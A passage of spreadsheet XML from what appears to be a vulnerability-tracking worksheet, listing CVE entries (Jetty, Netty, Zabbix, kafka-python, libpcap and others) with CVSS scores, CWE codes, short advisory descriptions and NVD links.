          <t>2026-08-16</t>
        </is>
      </c>
      <c r="J1091" s="5" t="inlineStr"/>
      <c r="K1091" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L1091" s="5" t="inlineStr">
        <is>
          <t>OpenTofu versions 1.8.0 through 1.8.2 do not properly restrict sensitive variables and locals when users have opted into static evaluation of module sources, versions, and backend configurations. As a result, values marked as sensitive may be exposed through these configuration elements instead of producing an error. This is fixed in OpenTofu 1.8.3, which adds explicit errors to prevent the use of sensitive values in these contexts.</t>
        </is>
      </c>
      <c r="M1091" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58375</t>
        </is>
      </c>
    </row>
    <row r="1092">
      <c r="A1092" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1092" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58381</t>
        </is>
      </c>
      <c r="C1092" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1092" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1092" s="5" t="inlineStr"/>
      <c r="F1092" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1092" s="5" t="inlineStr"/>
      <c r="H1092" s="5" t="inlineStr"/>
      <c r="I1092" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1092" s="5" t="inlineStr"/>
      <c r="K1092" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1092" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 5.11.1 contains a denial of service vulnerability in LoginPacket JSON processing that allows remote attackers to crash the server by sending malformed JSON data. Attackers can exploit improper object initialization from scalar JSON types to trigger unset required properties, causing the application to crash.</t>
        </is>
      </c>
      <c r="M1092" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58381</t>
        </is>
      </c>
    </row>
    <row r="1093">
      <c r="A1093" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1093" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58382</t>
        </is>
      </c>
      <c r="C1093" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1093" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1093" s="5" t="inlineStr"/>
      <c r="F1093" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1093" s="5" t="inlineStr"/>
      <c r="H1093" s="5" t="inlineStr"/>
      <c r="I1093" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1093" s="5" t="inlineStr"/>
      <c r="K1093" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1093" s="5" t="inlineStr">
        <is>
          <t>league/commonmark versions before 2.6.0 contain polynomial time complexity vulnerabilities in Markdown parsing that allow attackers to cause denial of service. Attackers can submit carefully crafted Markdown inputs designed to trigger worst-case performance, and sending multiple requests in parallel exhausts CPU resources and PHP-FPM processes.</t>
        </is>
      </c>
      <c r="M1093" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58382</t>
        </is>
      </c>
    </row>
    <row r="1094">
      <c r="A1094" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1094" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-34115</t>
        </is>
      </c>
      <c r="C1094" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1094" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1094" s="5" t="inlineStr"/>
      <c r="F1094" s="5" t="n">
        <v>0.033</v>
      </c>
      <c r="G1094" s="5" t="inlineStr"/>
      <c r="H1094" s="5" t="inlineStr"/>
      <c r="I1094" s="5" t="inlineStr">
        <is>
          <t>2025-07-15</t>
        </is>
      </c>
      <c r="J1094" s="5" t="inlineStr"/>
      <c r="K1094" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-306, CWE-78</t>
        </is>
      </c>
      <c r="L1094" s="5" t="inlineStr">
        <is>
          <t>An authenticated command injection vulnerability exists in OP5 Monitor through version 7.1.9 via the 'cmd_str' parameter in the command_test.php endpoint. A user with access to the web interface can exploit the 'Test this command' feature to execute arbitrary shell commands as the unprivileged web application user. The vulnerability resides in the configuration section of the application and requires valid login credentials with access to the command testing functionality. This issue is fixed in version 7.2.0.</t>
        </is>
      </c>
      <c r="M1094" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-34115</t>
        </is>
      </c>
    </row>
    <row r="1095">
      <c r="A1095" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1095" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0799</t>
        </is>
      </c>
      <c r="C1095" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1095" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1095" s="5" t="inlineStr"/>
      <c r="F1095" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1095" s="5" t="inlineStr"/>
      <c r="H1095" s="5" t="inlineStr"/>
      <c r="I1095" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1095" s="5" t="inlineStr"/>
      <c r="K1095" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-129, CWE-787</t>
        </is>
      </c>
      <c r="L1095" s="5" t="inlineStr">
        <is>
          <t>In BPF instructions that load/store a value from/to a scratch memory register the register index is an unsigned 32-bit integer and must not exceed 15, but libpcap BPF interpreter does not validate the value.  In particular uncommon use cases a crafted filter program can cause the interpreter to try reading and writing the OS process memory in the 16GiB starting at the current stack frame on 64-bit architectures and in the entire address space on 32-bit architectures.</t>
        </is>
      </c>
      <c r="M1095" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0799</t>
        </is>
      </c>
    </row>
    <row r="1096">
      <c r="A1096" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1096" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10143</t>
        </is>
      </c>
      <c r="C1096" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1096" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1096" s="5" t="inlineStr"/>
      <c r="F1096" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1096" s="5" t="inlineStr">
        <is>
          <t>python, kafka</t>
        </is>
      </c>
      <c r="H1096" s="5" t="inlineStr">
        <is>
          <t>dpkp:kafka-python</t>
        </is>
      </c>
      <c r="I1096" s="5" t="inlineStr">
        <is>
          <t>2026-06-10</t>
        </is>
      </c>
      <c r="J1096" s="5" t="inlineStr"/>
      <c r="K1096" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-606</t>
        </is>
      </c>
      <c r="L1096" s="5" t="inlineStr">
        <is>
          <t>kafka-python prior to 2.3.2 contains a denial-of-service vulnerability in SCRAM authentication handling that allows a malicious or machine-in-the-middle broker to freeze the client event loop by supplying an excessively large iteration count. In scram.py, ScramClient.process_server_first_message() passes the broker-controlled SCRAM iteration count directly to hashlib.pbkdf2_hmac() without validation, blocking producer sends, consumer polls, admin operations, and heartbeats, which can cause consumer group eviction and repeated reconnect failures.</t>
        </is>
      </c>
      <c r="M1096" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10143</t>
        </is>
      </c>
    </row>
    <row r="1097">
      <c r="A1097" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1097" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12143</t>
        </is>
      </c>
      <c r="C1097" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1097" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1097" s="5" t="inlineStr"/>
      <c r="F1097" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1097" s="5" t="inlineStr"/>
      <c r="H1097" s="5" t="inlineStr"/>
      <c r="I1097" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J1097" s="5" t="inlineStr"/>
      <c r="K1097" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L1097" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">form-data </t>
        </is>
      </c>
      <c r="M1097" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12143</t>
        </is>
      </c>
    </row>
    <row r="1098">
      <c r="A1098" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1098" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12562</t>
        </is>
      </c>
      <c r="C1098" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1098" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1098" s="5" t="inlineStr"/>
      <c r="F1098" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1098" s="5" t="inlineStr"/>
      <c r="H1098" s="5" t="inlineStr"/>
      <c r="I1098" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1098" s="5" t="inlineStr"/>
      <c r="K1098" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1098" s="5" t="inlineStr">
        <is>
          <t>The RCU II+ and Multiload II+ are vulnerable to an unauthenticated 
service that exposes a debug interface granting full root-level access 
to the embedded system. This vulnerability stems from a 
network-accessible port running a Target Communications Framework (TCF) 
service that does not require any authentication, allowing an attacker 
to directly interact with the Linux environment that powers the device. 
Once connected, an attacker can freely view and modify the filesystem, 
manipulate running processes, and control network interfaces, enabling 
deep alteration of system behavior.</t>
        </is>
      </c>
      <c r="M1098" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12562</t>
        </is>
      </c>
    </row>
    <row r="1099">
      <c r="A1099" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1099" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12611</t>
        </is>
      </c>
      <c r="C1099" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1099" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1099" s="5" t="inlineStr"/>
      <c r="F1099" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1099" s="5" t="inlineStr"/>
      <c r="H1099" s="5" t="inlineStr"/>
      <c r="I1099" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1099" s="5" t="inlineStr"/>
      <c r="K1099" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1099" s="5" t="inlineStr">
        <is>
          <t>A client may issue HTTP/2 requests to a Jetty server that result in blocking writes that are never unblocked, eventually causing all threads to be blocked and the whole server to become unresponsive.
This is caused by a race condition in the server when handling RST_STREAM frames and GOAWAY frames sent by the client.
The race condition "resets" the HTTP2Flusher.terminated, previously set to a non-null value, to the null value, allowing entries to be enqueued in the flusher that however will never be processed. These unprocessed entries are the ones that would unblock the write-blocked threads.</t>
        </is>
      </c>
      <c r="M1099" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12611</t>
        </is>
      </c>
    </row>
    <row r="1100">
      <c r="A1100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14297</t>
        </is>
      </c>
      <c r="C1100" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1100" s="5" t="inlineStr"/>
      <c r="F1100" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1100" s="5" t="inlineStr"/>
      <c r="H1100" s="5" t="inlineStr"/>
      <c r="I1100" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1100" s="5" t="inlineStr"/>
      <c r="K1100" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1100" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow in the Bluetooth Continuous Glucose
     Monitoring Service (CGMS) Record Access Control Point (RACP) write handler
     allows an authenticated BLE peer to overflow a 20-byte static buffer into
     adjacent BSS memory. The exploitable impact cannot be predetermined - it
     is entirely dependent on the linker-assigned BSS layout of the specific
     firmware build, which may vary.</t>
        </is>
      </c>
      <c r="M1100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14297</t>
        </is>
      </c>
    </row>
    <row r="1101">
      <c r="A1101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16174</t>
        </is>
      </c>
      <c r="C1101" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1101" s="5" t="inlineStr"/>
      <c r="F1101" s="5" t="inlineStr"/>
      <c r="G1101" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1101" s="5" t="inlineStr"/>
      <c r="I1101" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1101" s="5" t="inlineStr"/>
      <c r="K1101" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1101" s="5" t="inlineStr">
        <is>
          <t>Netskope was notified about a potential gap in Netskope Endpoint DLP (EPDLP) running on Windows systems. Successful exploitation of the gap could potentially allow a privileged user to send a crafted message to the EPDLP process port to trigger an integer overflow, leading to memory corruption. Successful exploitation would require the EPDLP module to be enabled in the client configuration, and that Memory Integrity is disabled. A successful exploit could potentially result in a denial-of-service, arbitrary code execution, or privilege escalation on the local machine.</t>
        </is>
      </c>
      <c r="M1101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16174</t>
        </is>
      </c>
    </row>
    <row r="1102">
      <c r="A1102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18608</t>
        </is>
      </c>
      <c r="C1102" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1102" s="5" t="inlineStr"/>
      <c r="F1102" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1102" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1102" s="5" t="inlineStr"/>
      <c r="I1102" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1102" s="5" t="inlineStr"/>
      <c r="K1102" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L1102" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Data Science Pipelines Operator (DSPO). The operator's ClusterRole, which defines its permissions, includes extensive privileges beyond what is necessary for its operation. These excessive permissions, such as the ability to execute commands within pods and manage cluster-wide roles, could be exploited. If the DSPO pod were compromised, an attacker could leverage these privileges to gain full administrative control over the entire Kubernetes cluster.</t>
        </is>
      </c>
      <c r="M1102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18608</t>
        </is>
      </c>
    </row>
    <row r="1103">
      <c r="A1103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19204</t>
        </is>
      </c>
      <c r="C1103" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1103" s="5" t="inlineStr"/>
      <c r="F1103" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1103" s="5" t="inlineStr"/>
      <c r="H1103" s="5" t="inlineStr"/>
      <c r="I1103" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1103" s="5" t="inlineStr"/>
      <c r="K1103" s="5" t="inlineStr">
        <is>
          <t>CWE-770, CWE-789</t>
        </is>
      </c>
      <c r="L1103" s="5" t="inlineStr">
        <is>
          <t>A client may send a WebSocket frame with an unknown opcode and a very large declared payload length, causing Jetty to attempt a large memory allocation and potentially exhaust the JVM heap.
This occurs when auto-fragmentation is enabled, as unknown opcodes bypass the normal maximum frame size handling and payload allocation occurs before the opcode is validated.</t>
        </is>
      </c>
      <c r="M1103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19204</t>
        </is>
      </c>
    </row>
    <row r="1104">
      <c r="A1104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19486</t>
        </is>
      </c>
      <c r="C1104" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1104" s="5" t="inlineStr"/>
      <c r="F1104" s="5" t="inlineStr"/>
      <c r="G1104" s="5" t="inlineStr"/>
      <c r="H1104" s="5" t="inlineStr"/>
      <c r="I1104" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1104" s="5" t="inlineStr"/>
      <c r="K1104" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1104" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery (SSRF) vulnerability in Google Cloud Gemini Enterprise Agent Platform App Builder versions prior to 2026-06-01 on Google Cloud Platform allows an unauthenticated attacker to leak the Compute Engine default service account access token.
This vulnerability was patched on 01 June 2026. Users will need to redeploy their previously deployed apps.</t>
        </is>
      </c>
      <c r="M1104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19486</t>
        </is>
      </c>
    </row>
    <row r="1105">
      <c r="A1105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21042</t>
        </is>
      </c>
      <c r="C1105" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1105" s="5" t="inlineStr"/>
      <c r="F1105" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1105" s="5" t="inlineStr"/>
      <c r="H1105" s="5" t="inlineStr"/>
      <c r="I1105" s="5" t="inlineStr">
        <is>
          <t>2026-07-10</t>
        </is>
      </c>
      <c r="J1105" s="5" t="inlineStr"/>
      <c r="K1105" s="5" t="inlineStr"/>
      <c r="L1105" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libsavsac.so prior to SMR Jul-2026 Release 1 allows remote attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M1105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21042</t>
        </is>
      </c>
    </row>
    <row r="1106">
      <c r="A1106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23921</t>
        </is>
      </c>
      <c r="C1106" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1106" s="5" t="inlineStr"/>
      <c r="F1106" s="5" t="n">
        <v>0.029</v>
      </c>
      <c r="G1106" s="5" t="inlineStr"/>
      <c r="H1106" s="5" t="inlineStr">
        <is>
          <t>zabbix:zabbix</t>
        </is>
      </c>
      <c r="I1106" s="5" t="inlineStr">
        <is>
          <t>2026-03-24</t>
        </is>
      </c>
      <c r="J1106" s="5" t="inlineStr"/>
      <c r="K1106" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1106" s="5" t="inlineStr">
        <is>
          <t>A low privilege Zabbix user with API access can exploit a blind SQL injection vulnerability in include/classes/api/CApiService.php to execute arbitrary SQL selects via the sortfield parameter. Although query results are not returned directly, an attacker can exfiltrate arbitrary database data through time-based techniques, potentially leading to session identifier disclosure and administrator account compromise.</t>
        </is>
      </c>
      <c r="M1106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23921</t>
        </is>
      </c>
    </row>
    <row r="1107">
      <c r="A1107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29063</t>
        </is>
      </c>
      <c r="C1107" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1107" s="5" t="inlineStr"/>
      <c r="F1107" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1107" s="5" t="inlineStr"/>
      <c r="H1107" s="5" t="inlineStr">
        <is>
          <t>immutable-js:immutable</t>
        </is>
      </c>
      <c r="I1107" s="5" t="inlineStr">
        <is>
          <t>2026-03-06</t>
        </is>
      </c>
      <c r="J1107" s="5" t="inlineStr"/>
      <c r="K1107" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-915</t>
        </is>
      </c>
      <c r="L1107" s="5" t="inlineStr">
        <is>
          <t>Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5.</t>
        </is>
      </c>
      <c r="M1107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29063</t>
        </is>
      </c>
    </row>
    <row r="1108">
      <c r="A1108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33197</t>
        </is>
      </c>
      <c r="C1108" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1108" s="5" t="inlineStr"/>
      <c r="F1108" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1108" s="5" t="inlineStr"/>
      <c r="H1108" s="5" t="inlineStr"/>
      <c r="I1108" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1108" s="5" t="inlineStr"/>
      <c r="K1108" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L1108" s="5" t="inlineStr">
        <is>
          <t>AMI APTIOV contains a vulnerability in BIOS where a privileged user may cause the “Incomplete List of Disallowed Inputs” by local access. Successful exploitation of this vulnerability may lead to arbitrary code execution and impact system Confidentiality, Integrity, and Availability.</t>
        </is>
      </c>
      <c r="M1108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33197</t>
        </is>
      </c>
    </row>
    <row r="1109">
      <c r="A1109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33871</t>
        </is>
      </c>
      <c r="C1109" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1109" s="5" t="inlineStr"/>
      <c r="F1109" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1109" s="5" t="inlineStr"/>
      <c r="H1109" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I1109" s="5" t="inlineStr">
        <is>
          <t>2026-03-27</t>
        </is>
      </c>
      <c r="J1109" s="5" t="inlineStr"/>
      <c r="K1109" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1109" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, a remote user can trigger a Denial of Service (DoS) against a Netty HTTP/2 server by sending a flood of `CONTINUATION` frames. The server's lack of a limit on the number of `CONTINUATION` frames, combined with a bypass of existing size-based mitigations using zero-byte frames, allows an user to cause excessive CPU consumption with minimal bandwidth, rendering the server unresponsive. Versions 4.1.132.Final and 4.2.10.Final fix the issue.</t>
        </is>
      </c>
      <c r="M1109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33871</t>
        </is>
      </c>
    </row>
    <row r="1110">
      <c r="A1110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3505</t>
        </is>
      </c>
      <c r="C1110" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1110" s="5" t="inlineStr"/>
      <c r="F1110" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1110" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1110" s="5" t="inlineStr"/>
      <c r="I1110" s="5" t="inlineStr">
        <is>
          <t>2026-04-15</t>
        </is>
      </c>
      <c r="J1110" s="5" t="inlineStr"/>
      <c r="K1110" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L1110" s="5" t="inlineStr">
        <is>
          <t>Allocation of resources without limits or throttling, Uncontrolled Resource Consumption vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcpg on all (pg modules).
 This vulnerability is associated with program files AEADEncDataPacket.Java, BcAEADUtil.Java, JceAEADUtil.Java, OperatorHelper.Java.
This issue affects BC-JAVA: from 1.74 before 1.80.2, from 1.81 before 1.81.1, from 1.82 before 1.84.</t>
        </is>
      </c>
      <c r="M1110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3505</t>
        </is>
      </c>
    </row>
    <row r="1111">
      <c r="A1111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35469</t>
        </is>
      </c>
      <c r="C1111" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1111" s="5" t="inlineStr"/>
      <c r="F1111" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1111" s="5" t="inlineStr"/>
      <c r="H1111" s="5" t="inlineStr"/>
      <c r="I1111" s="5" t="inlineStr">
        <is>
          <t>2026-04-16</t>
        </is>
      </c>
      <c r="J1111" s="5" t="inlineStr"/>
      <c r="K1111" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1111" s="5" t="inlineStr">
        <is>
          <t>spdystream is a Go library for multiplexing streams over SPDY connections. In versions 0.5.0 and below, the SPDY/3 frame parser does not validate attacker-controlled counts and lengths before allocating memory. Three allocation paths are affected: the SETTINGS frame entry count, the header count in parseHeaderValueBlock, and individual header field sizes — all read as 32-bit integers and used directly as allocation sizes with no bounds checking. Because SPDY header blocks are zlib-compressed, a small on-the-wire payload can decompress into large attacker-controlled values. A remote peer that can send SPDY frames to a service using spdystream can exhaust process memory and cause an out-of-memory crash with a single crafted control frame. This issue has been fixed in version 0.5.1.</t>
        </is>
      </c>
      <c r="M1111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35469</t>
        </is>
      </c>
    </row>
    <row r="1112">
      <c r="A1112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40192</t>
        </is>
      </c>
      <c r="C1112" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1112" s="5" t="inlineStr"/>
      <c r="F1112" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1112" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1112" s="5" t="inlineStr">
        <is>
          <t>python:pillow</t>
        </is>
      </c>
